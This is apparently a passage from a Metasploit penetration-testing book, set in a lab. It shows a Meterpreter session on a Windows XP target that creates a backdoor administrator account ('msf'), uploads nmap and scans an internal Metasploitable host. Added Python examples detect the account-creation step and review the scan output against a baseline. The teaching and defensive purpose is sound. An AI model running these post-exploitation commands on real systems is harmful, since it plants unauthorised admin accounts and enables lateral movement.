258
Chapter 17
Process 2480 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
net user msf metasploit /add
net user msf metasploit /ADD
The command completed successfully.
C:\WINDOWS\system32>
net localgroup administrators msf /add
net localgroup administrators msf /add
The command completed successfully.
C:\WINDOWS\system32>
C:\WINDOWS\system32>
^Z
Background channel 6? [y/N] y
meterpreter >
upload nmap.exe
[*] uploading : nmap.exe -> nmap.exe
[*] uploaded : nmap.exe -> nmap.exe
meterpreter >
We now have our launching pad for additional attacks. With nmap installed on the target, we are essentially sitting on the internal network. We can now attempt to enumerate internally connected systems and further penetrate the network.
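The session above leaves two artifacts a defender can key on: a local account is created (net user /add) and, seconds later, it is placed in the Administrators group (net localgroup administrators /add). The following detection is an added example, not code from the book or from Metasploit: it correlates Windows Security events modelled on IDs 4720 (user account created) and 4732 (member added to a security-enabled local group) that occur for the same account within a short window. The event records are constructed for this example; on an XP-era system such as the target above, the equivalent legacy IDs are 624 and 636 (the newer IDs are the old ones plus 4096). The field names and the ten-minute window are assumptions of this example.

```python
"""Correlate 'user created' with 'added to Administrators' on the same host.

Added example (not from the book). Events are a constructed, normalised
view of Windows Security log records: 4720 = account created,
4732 = member added to a security-enabled local group.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events. The first pair mirrors the transcript above
# (account 'msf' created, then made a local administrator a few seconds
# later); the second pair is a routine helpdesk action a day apart.
SAMPLE_EVENTS = [
    {"ts": "2011-06-01T10:00:02", "id": 4720, "host": "xp-victim",
     "subject": "SYSTEM", "user": "msf", "group": None},
    {"ts": "2011-06-01T10:00:09", "id": 4732, "host": "xp-victim",
     "subject": "SYSTEM", "user": "msf", "group": "Administrators"},
    {"ts": "2011-06-01T11:30:00", "id": 4720, "host": "hr-desk",
     "subject": "helpdesk", "user": "jdoe", "group": None},
    {"ts": "2011-06-02T09:00:00", "id": 4732, "host": "hr-desk",
     "subject": "helpdesk", "user": "jdoe", "group": "Administrators"},
]


def find_quick_admin_creations(events, window=timedelta(minutes=10)):
    """Return (host, user, seconds_between) tuples for every account that
    was created and then added to Administrators within `window`.

    Events are processed in timestamp order so a group addition is only
    matched against creations that precede it.
    """
    created = defaultdict(list)   # (host, user) -> [creation timestamps]
    hits = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        key = (ev["host"], ev["user"].lower())
        if ev["id"] == 4720:
            created[key].append(ts)
        elif ev["id"] == 4732 and (ev["group"] or "").lower() == "administrators":
            for creation_ts in created[key]:
                delta = ts - creation_ts
                if timedelta(0) <= delta <= window:
                    hits.append((ev["host"], ev["user"],
                                 int(delta.total_seconds())))
    return hits


if __name__ == "__main__":
    for host, user, secs in find_quick_admin_creations(SAMPLE_EVENTS):
        print(f"ALERT {host}: '{user}' created and made admin {secs}s later")
```

Only the xp-victim pair fires; the helpdesk pair is separated by a day and is ignored. In practice the subject field (here SYSTEM, which is how a shell obtained through an exploit typically appears) is a second signal worth weighting, since legitimate account provisioning is normally done by a named administrator.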
Scanning the Metasploitable System
With our Meterpreter session granting us access to the internal network via the load auto_add_route command, we can scan and exploit the inside hosts using the compromised Windows XP target as the launching point. We're effectively connected to the internal network, so we should be able to reach our Metasploitable system. Let's begin with a basic port scan.
nmap.exe -sT -A -P0 172.16.32.162
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
|_ftp-bounce: no banner
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
|_html-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB
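The scan output above is nmap's normal-format port table: one line per port (port/protocol, state, service, version) with NSE script results indented under a leading "|". A defender reviewing such output wants it in structured form so it can be compared against an approved baseline for the host. The parser and review below are an added example, not part of the book or of nmap; the sample text is the port table from the scan above, and the baseline set of expected ports and the list of services treated as cleartext are assumptions of this example.

```python
"""Parse an nmap normal-format port table and review it against a baseline.

Added example (not from the book or from nmap). SAMPLE_SCAN reproduces
the port table printed above; script-output lines beginning with '|'
are skipped by the parser.
"""
import re
from dataclasses import dataclass

SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
|_ftp-bounce: no banner
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB
"""

# port/proto  state  service  [version text...]
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)

# Services that carry credentials or data unencrypted (assumed list).
CLEARTEXT_SERVICES = {"ftp", "telnet"}


@dataclass(frozen=True)
class Service:
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_nmap_normal(text):
    """Return a Service per port line; header and '|' script lines are ignored."""
    services = []
    for raw in text.splitlines():
        m = PORT_LINE.match(raw.strip())
        if m:
            services.append(Service(int(m["port"]), m["proto"], m["state"],
                                    m["service"], m["version"].strip()))
    return services


def review(services, expected_ports):
    """Flag open ports outside the baseline and open cleartext services."""
    findings = []
    for s in services:
        if s.state != "open":
            continue
        if s.port not in expected_ports:
            findings.append(f"{s.port}/{s.proto} {s.service} not in baseline")
        if s.service in CLEARTEXT_SERVICES:
            findings.append(f"{s.port}/{s.proto} {s.service} is a cleartext service")
    return findings


if __name__ == "__main__":
    found = parse_nmap_normal(SAMPLE_SCAN)
    # Assumed baseline: only SSH and HTTP are approved on this host.
    for finding in review(found, expected_ports={22, 80}):
        print(finding)
```

With a baseline of only ports 22 and 80, every other open port is reported, and FTP and telnet are additionally called out as cleartext, which is the kind of inventory a blue team would want before an attacker reaches this point.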